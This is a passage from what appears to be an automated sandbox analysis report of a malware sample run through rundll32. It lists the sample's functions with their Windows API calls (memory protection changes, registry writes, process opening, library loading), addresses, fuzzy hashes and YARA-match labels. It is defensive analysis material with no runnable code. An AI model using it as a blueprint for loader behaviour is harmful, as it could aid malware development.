                                            • SetEvent.KERNEL32(?), ref: 058064BF
                                            • GetLastError.KERNEL32(0580EC0C,00000000,00000000), ref: 058064EE
                                            • CloseHandle.KERNEL32(00000000,0580EC0C,00000000,00000000), ref: 058064FE
                                              • Part of subcall function 05815F3B: lstrlenW.KERNEL32(?,73E806E0,05822F1B,80000001,?,?,0580C229,?,?,058040AD,00000000,?,00000000,?), ref: 05815F47
                                              • Part of subcall function 05815F3B: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,0580C229,?,?,058040AD,00000000,?,00000000,?), ref: 05815F6F
                                              • Part of subcall function 05815F3B: memset.NTDLL ref: 05815F81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1106445334-0
                                            • Opcode ID: b495f3c49c9870d93dc6f76697730dfc0db1d8abecbd62e07923497a5c0eda2a
                                            • Instruction ID: 6c48ca050133d30995d1b8ef53324bd778b1248edb058cc62496b70f9874c2e2
                                            • Opcode Fuzzy Hash: b495f3c49c9870d93dc6f76697730dfc0db1d8abecbd62e07923497a5c0eda2a
                                            • Instruction Fuzzy Hash: 4321A135710704ABDBA1AB7ADC4AB5A7FECBF01620B005528FD42D21A0EB74EC908B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058213BB Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0581A2F0,00000000,?,?), ref: 058213D9
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 058213E9
                                            • ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E), ref: 05821415
                                            • GetLastError.KERNEL32(?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0582143A
                                            • CloseHandle.KERNEL32(000000FF,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0582144B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastReadSize
                                            • String ID:
                                            • API String ID: 3577853679-0
                                            • Opcode ID: d9854a0cdbf40bdcc3260ec976b340810b42a241df90a38ef105db7768eab702
                                            • Instruction ID: 23864f5abf0a6f6bf5134c8fa364a7ca0a5dce11d594380c13dd0a94b8acb320
                                            • Opcode Fuzzy Hash: d9854a0cdbf40bdcc3260ec976b340810b42a241df90a38ef105db7768eab702
                                            • Instruction Fuzzy Hash: DE119072100268BBDB205F68D88DEAE7E5EFB54364F218525FD1AD7190D6709CC0C6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580147E Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrChrA.SHLWAPI(?,0000002C), ref: 0580148F
                                            • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 058014A8
                                            • StrTrimA.SHLWAPI(?,?), ref: 058014D0
                                            • StrTrimA.SHLWAPI(00000000,?), ref: 058014DF
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 05801516
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Trim$FreeHeap
                                            • String ID:
                                            • API String ID: 2132463267-0
                                            • Opcode ID: cb27be93eb6f014b0e4f825e71850f9a75136bf2bb852aa06bba2f7d22065f64
                                            • Instruction ID: bd38d5a1b32dac10e68c199ff33d495ca052a25d8446d984f695f2617504422d
                                            • Opcode Fuzzy Hash: cb27be93eb6f014b0e4f825e71850f9a75136bf2bb852aa06bba2f7d22065f64
                                            • Instruction Fuzzy Hash: 10119676200205BBDB619A59DC89FAB7FADEB48760F044021FE09DB281DB75ED01CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581B6D8 Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,0054E5A8,0581BAB4,0581D73E,?,?,?,05819DA8,76C85520,?,0581BAB4,00000000), ref: 0581B70F
                                            • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,05819DA8,76C85520,?,0581BAB4,00000000,?,00000000,0581D73E,00000000), ref: 0581B73F
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 0581B74E
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 0581B76C
                                            • GetLastError.KERNEL32(?,05819DA8,76C85520,?,0581BAB4,00000000,?,00000000,0581D73E,00000000), ref: 0581B77C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                            • String ID:
                                            • API String ID: 653387826-0
                                            • Opcode ID: d4fb0524d0f8fe0a09b34690415dd74c31adbdf4c586f5de6fbaae1e7b16b0a6
                                            • Instruction ID: dfe5191f570f4ee927b2ac63af0879a06255f0d005c7ce3ee3270f5632582509
                                            • Opcode Fuzzy Hash: d4fb0524d0f8fe0a09b34690415dd74c31adbdf4c586f5de6fbaae1e7b16b0a6
                                            • Instruction Fuzzy Hash: 7421F5B5600B05AFC720DFA8C98595ABBF8FB08214B008929EE56D7750E770FD84CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05807B81 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 05807BAF
                                            • GetLastError.KERNEL32 ref: 05807BD2
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05807BE5
                                            • GetLastError.KERNEL32 ref: 05807BF0
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05807C38
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                            • String ID:
                                            • API String ID: 1671499436-0
                                            • Opcode ID: 09bf401e4fa80fa31f655551e7b403f7f9c2efa90355c57a1cf060e0a28b65c5
                                            • Instruction ID: 70ea8a26f63047e462a18c837846d5c63fc0adf1a8c90ae1b6a0d75008b6ffa9
                                            • Opcode Fuzzy Hash: 09bf401e4fa80fa31f655551e7b403f7f9c2efa90355c57a1cf060e0a28b65c5
                                            • Instruction Fuzzy Hash: F5218071100244AFEBB09B54DC89B6A7FBAFB00329F205428FD42D65E0C775BDC48B21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05802F6E Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCreateKeyA.ADVAPI32(80000001,?,-00000005), ref: 05802F82
                                            • memcpy.NTDLL(00000000,00000001,-00000005,-00000005,-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FAB
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,-00000005), ref: 05802FD4
                                            • RegSetValueExA.ADVAPI32(-00000005,?,00000000,00000003,00000000,00000000,-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FF4
                                            • RegCloseKey.ADVAPI32(-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FFF
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Value$AllocateCloseCreateHeapmemcpy
                                            • String ID:
                                            • API String ID: 2954810647-0
                                            • Opcode ID: 561747597582b83a19c7df39d68a912f2f1f4c6940cca4b848a60e43308581a5
                                            • Instruction ID: 91cca1e2605092dc3a14fa881ac21f0c7489546c02a06183892da5332ebd65f6
                                            • Opcode Fuzzy Hash: 561747597582b83a19c7df39d68a912f2f1f4c6940cca4b848a60e43308581a5
                                            • Instruction Fuzzy Hash: 8F11A376204219BBDF726E64EC49EBB7E6DEB44691F044025FE02E2190DAB18C609B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05810B6D Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05810B8A
                                            • memcpy.NTDLL(?,?,00000009), ref: 05810BAC
                                            • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 05810BC4
                                            • lstrlenW.KERNEL32(?,00000001,?), ref: 05810BE4
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 05810C09
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3065863707-0
                                            • Opcode ID: 54e6dcee805c01cf6b26484eb3ef74bea964d82d973fce33d81783bce95875fa
                                            • Instruction ID: 14b0f1fdd28781d78da00ee12dbde4e9b20d95b1be1cfbe42cabfcdd17ce2d64
                                            • Opcode Fuzzy Hash: 54e6dcee805c01cf6b26484eb3ef74bea964d82d973fce33d81783bce95875fa
                                            • Instruction Fuzzy Hash: 12114239A15208FBDF219BA5DC4DFDE7FBCAB48710F008051FE05E6280DA74A684CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05811843 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcmpi.KERNEL32(00000000,?), ref: 05811872
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0581187F
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 05811892
                                            • lstrcmpi.KERNEL32(05829460,00000000), ref: 058118B2
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0580D570,00000000), ref: 058118C6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                            • String ID:
                                            • API String ID: 1266740956-0
                                            • Opcode ID: 4569d9381c08e7539889fa4b28ce0e86e501e07dce47a840df2dffba90055320
                                            • Instruction ID: 5d6537e07ac6332e7fea02415c4d022792e0478df9199256c5fdeaf5a618cd03
                                            • Opcode Fuzzy Hash: 4569d9381c08e7539889fa4b28ce0e86e501e07dce47a840df2dffba90055320
                                            • Instruction Fuzzy Hash: 2D115971914219EFDB14DB99D84AA9ABFACFB04324F058026FE09D3250DB34BD84CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05815B7E Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,05814325,00000000,00000000,00000000,00000000,00000000,?,0580479A,00000000,00000000,00000000,00000000), ref: 05815B88
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 05815BAC
                                            • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0580479A,00000000,00000000,00000000,00000000), ref: 05815BB3
                                            • lstrcpy.KERNEL32(00000000,?), ref: 05815BFB
                                            • lstrcat.KERNEL32(00000000,?), ref: 05815C0A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2616531654-0
                                            • Opcode ID: 96ac58e341977727e987b29803b2c5cc34675f684980b87e805b9f78e4465d21
                                            • Instruction ID: c46c35d19859255a9d7926493034a9d073fe05fb44fbc1c823956787582d93b7
                                            • Opcode Fuzzy Hash: 96ac58e341977727e987b29803b2c5cc34675f684980b87e805b9f78e4465d21
                                            • Instruction Fuzzy Hash: 0411A0762042069BE730DA69D989E2B7FEDEBC5210F044429FE05D2100DB34ED85CB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581C301 Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581C9C0: lstrlen.KERNEL32(00000000,00000000,?,00000000,05821538,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0581C9CC
                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0581C32A
                                            • memcpy.NTDLL(00000000,?,?), ref: 0581C33D
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0581C34E
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581C363
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0581C39B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                            • String ID:
                                            • API String ID: 2349942465-0
                                            • Opcode ID: 2649967ccfaf1ad1ee3c90c8cd35423ff988075bc856e411883db176a281a863
                                            • Instruction ID: 4c030406a30b6588fde61041c8f3d6f1cba628c0dca13cb414a2937285a32395
                                            • Opcode Fuzzy Hash: 2649967ccfaf1ad1ee3c90c8cd35423ff988075bc856e411883db176a281a863
                                            • Instruction Fuzzy Hash: A911E572255250AFC7215F28EC89C6B7FADEB45321B01813AFD46D3210CA31AC94CBBA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581A952 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(0580B047,00000000,00000000,00000000,?,0582090A,?,0580B047,00000000), ref: 0581A968
                                            • lstrlen.KERNEL32(?,?,0582090A,?,0580B047,00000000), ref: 0581A96F
                                            • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0581A97D
                                              • Part of subcall function 05806FF3: GetLocalTime.KERNEL32(?,?,?,?,0580161B,00000000,00000001), ref: 05806FFD
                                              • Part of subcall function 05806FF3: wsprintfA.USER32 ref: 05807030
                                            • wsprintfA.USER32 ref: 0581A99F
                                              • Part of subcall function 0581EAB5: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,0581A9C7,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0581EAD3
                                              • Part of subcall function 0581EAB5: wsprintfA.USER32 ref: 0581EAF8
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0581A9D0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                            • String ID:
                                            • API String ID: 3847261958-0
                                            • Opcode ID: 8bcafcb2b61a43daf97349871459a1d5017cdaa6fa345d85a805c0a2c7687911
                                            • Instruction ID: 56bf83e2020f32a3740178e09fe827092727a739004b4703c9c8c39f1bc45a25
                                            • Opcode Fuzzy Hash: 8bcafcb2b61a43daf97349871459a1d5017cdaa6fa345d85a805c0a2c7687911
                                            • Instruction Fuzzy Hash: 6C016532100218BBDF215F66EC49DAA7F6DFB84760F00C022FD1996151DA329D95DBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581C090 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                            Download Yara Rule
                                            APIs
                                            • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C0CF
                                            • ResetEvent.KERNEL32(?,?,0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C0D4
                                            • GetLastError.KERNEL32(0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C0EF
                                            • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C11E
                                              • Part of subcall function 0580F123: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?,?,00000000), ref: 0580F12F
                                              • Part of subcall function 0580F123: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?), ref: 0580F18D
                                              • Part of subcall function 0580F123: lstrcpy.KERNEL32(00000000,00000000), ref: 0580F19D
                                            • SetEvent.KERNEL32(?,0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C110
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                            • String ID:
                                            • API String ID: 1449191863-0
                                            • Opcode ID: 96ec67d146d8c90cf39eb4a39b719a395273fd6befd243f1668b63caed2471e7
                                            • Instruction ID: 0e53a4857e751a2bb846fe90ca8bc84d4756ce09e0fe7b5ca28c248febe629a7
                                            • Opcode Fuzzy Hash: 96ec67d146d8c90cf39eb4a39b719a395273fd6befd243f1668b63caed2471e7
                                            • Instruction Fuzzy Hash: FF114F31180209ABDB316F64DC45E9B3FA9FF043A4F148610FD15C10A0D735EC61DB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05819F3E Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 05819F55
                                              • Part of subcall function 0580E628: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0580E63F
                                              • Part of subcall function 0580E628: SetEvent.KERNEL32(?,?,?,?,0580D3E9,?,?), ref: 0580E64F
                                            • lstrlen.KERNEL32(?,?,?,?,?,0581055F,?,?), ref: 05819F78
                                            • lstrlen.KERNEL32(?,?,?,?,0581055F,?,?), ref: 05819F82
                                            • memcpy.NTDLL(?,?,00004000,?,?,0581055F,?,?), ref: 05819F93
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,0581055F,?,?), ref: 05819FB5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                                            • String ID:
                                            • API String ID: 442095154-0
                                            • Opcode ID: 6e4b36a5ef336a8d612a4302c1da595c42df2ecbbb0d17ad45412a27d379450d
                                            • Instruction ID: cfe7d0f84b5b81b0cb851e7ec19a3b28c25ca15f14c2f64833b62f0626d4dda3
                                            • Opcode Fuzzy Hash: 6e4b36a5ef336a8d612a4302c1da595c42df2ecbbb0d17ad45412a27d379450d
                                            • Instruction Fuzzy Hash: 2C117975604608FFDB219B54EC45EAABFB9EB85320F208024FD06E3260DB31ED408B29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058065B6 Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • lstrlenW.KERNEL32(00000000,76CDF560,00000000,?,00000000,?,?,05805512,00000020), ref: 058065E2
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058065F4
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05805512,00000020), ref: 05806611
                                            • lstrlenW.KERNEL32(00000000,?,?,05805512,00000020), ref: 0580661D
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,05805512,00000020), ref: 05806631
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                            • String ID:
                                            • API String ID: 3403466626-0
                                            • Opcode ID: c08735fd20f3e1aa4402860d7077deedd57d3433f42f12de4931b520dddfc809
                                            • Instruction ID: 6335d285c6c2f282548efc5c8ab7ef6ea8ef45e4014698421c867cd72a51e916
                                            • Opcode Fuzzy Hash: c08735fd20f3e1aa4402860d7077deedd57d3433f42f12de4931b520dddfc809
                                            • Instruction Fuzzy Hash: 0A016972111204BFDB619B99EC8AFEA7FACEF09710F008015FE0597150DBB4A9458B6A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05819EC4 Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32 ref: 05819EE4
                                            • GetModuleHandleA.KERNEL32 ref: 05819EF2
                                            • LoadLibraryExW.KERNEL32(?,?,?), ref: 05819EFF
                                            • GetModuleHandleA.KERNEL32 ref: 05819F16
                                            • GetModuleHandleA.KERNEL32 ref: 05819F22
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HandleModule$LibraryLoad
                                            • String ID:
                                            • API String ID: 1178273743-0
                                            • Opcode ID: e4832bf1b7eeb8699ef531b03c1d486e83843243ac0fcf9feb8cdb4d6c7910a2
                                            • Instruction ID: fb5f01aa782bd40630ae347d3046583b039030424a849cf1b1a23b7f3287ba80
                                            • Opcode Fuzzy Hash: e4832bf1b7eeb8699ef531b03c1d486e83843243ac0fcf9feb8cdb4d6c7910a2
                                            • Instruction Fuzzy Hash: 9501AD3161831AAF9F115F6AEC41A6A3FAEFB082607004036FD19C2160DF71DC218FA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580B7FA Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,05821EAE), ref: 0580B800
                                            • StrTrimA.SHLWAPI(00000001,?,?,05821EAE), ref: 0580B823
                                            • StrTrimA.SHLWAPI(00000000,?,?,05821EAE), ref: 0580B832
                                            • _strupr.NTDLL ref: 0580B835
                                            • lstrlen.KERNEL32(00000000,05821EAE), ref: 0580B83D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Trim$_struprlstrlen
                                            • String ID:
                                            • API String ID: 2280331511-0
                                            • Opcode ID: 2cabc5701f256665a216db3288dfaa5f54808123ce327daba36af619bbb7c608
                                            • Instruction ID: 93b0641b4c399f6f23efc61fb786fd5a51b83afd66298dc8d23797c8877d005e
                                            • Opcode Fuzzy Hash: 2cabc5701f256665a216db3288dfaa5f54808123ce327daba36af619bbb7c608
                                            • Instruction Fuzzy Hash: 72F06271311115AFEA25AB66EC8EE7F3FEDEB45651F008009FD05C7240DF24AC418B66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580E726 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 0580E731
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 0580E742
                                            • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,058074E7,?,?,05829448,0580340D,00000003), ref: 0580E759
                                            • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,058074E7,?,?,05829448,0580340D,00000003), ref: 0580E773
                                            • GetLastError.KERNEL32(?,?,058074E7,?,?,05829448,0580340D,00000003), ref: 0580E780
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                            • String ID:
                                            • API String ID: 653387826-0
                                            • Opcode ID: f0a783950484ca72a2f353d83bcf6d2d3b94df973326605fbe687078f2908165
                                            • Instruction ID: e2bc2e21e4a01d86fc5bf6acf4a9bee79e3fa962f1dcb62c541679680cb534e6
                                            • Opcode Fuzzy Hash: f0a783950484ca72a2f353d83bcf6d2d3b94df973326605fbe687078f2908165
                                            • Instruction Fuzzy Hash: 39018F75200304AFD7219F55CC05D6ABFF9FF84220B118529FE56932A0DB30FD058B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581199F Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05815D07,?), ref: 058119A7
                                            • GetVersion.KERNEL32 ref: 058119B6
                                            • GetCurrentProcessId.KERNEL32 ref: 058119D2
                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 058119EF
                                            • GetLastError.KERNEL32 ref: 05811A0E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                            • String ID:
                                            • API String ID: 2270775618-0
                                            • Opcode ID: fa4172024360fca2564ff1730eef3031fbda8f8c5e2bbe5c65cb87885b25481f
                                            • Instruction ID: 4d979951fa41b623f3814ed071833a00d31d581592d29740df3e5444fb25b8e4
                                            • Opcode Fuzzy Hash: fa4172024360fca2564ff1730eef3031fbda8f8c5e2bbe5c65cb87885b25481f
                                            • Instruction Fuzzy Hash: 7BF069707643029BDB30AB26A81FB643EAAB704B41F108115FE52C61D0DB74A481CB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580F9D0 Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 0580F9DD
